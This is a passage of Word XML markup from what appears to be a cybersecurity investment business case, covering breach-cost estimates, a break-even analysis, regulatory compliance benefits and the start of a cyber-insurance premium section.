        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Supply Chain Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>8%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£25M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£14M</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidTr="005B63D6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TOTAL ANNUAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>£22M expected loss</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>£19.5M avoided</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="005B63D6" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>19:1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">These probability estimates are based on Verizon's 2024 Data Breach Investigations Report, which found that 15% of healthcare organizations experienced data breaches, with 68% involving external actors </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[83]</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Break-Even Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Total Investment (Year 1):</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £1,035,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Annu</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>al Operational Cost (Year 2+):</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £540,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expected Breach Cost Avoided (Annual):</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £19,500,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Break-Even Time:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 19 days</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5-Year Net Benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>£95,265,000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regulatory Compliance Value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regulatory Requirements Met:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- GDPR Arti</w:t>
      </w:r>
      <w:r w:rsidR="005B63D6" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>cle 32 (Security of Processing)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[72]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- HIPAA Security Rule (Admin</w:t>
      </w:r>
      <w:r w:rsidR="005B63D6" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">istrative/Technical Safeguards) </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[84]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- ISO 27001:2022 Controls </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[85]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- NIST Cybersecurity Framework</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[86]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compliance Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- Avoid ICO fines (up to 4% of global revenue = £15M potential) </w:t>
      </w:r>
      <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>[74]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Meet cyber insurance policy requirements (maintain coverage)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Demonstrate due diligence to partners/investors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insurance Premium Impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current Cyber Insurance:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Annual Premium: £500,000</w:t>
      </w:r>
    </w:p>
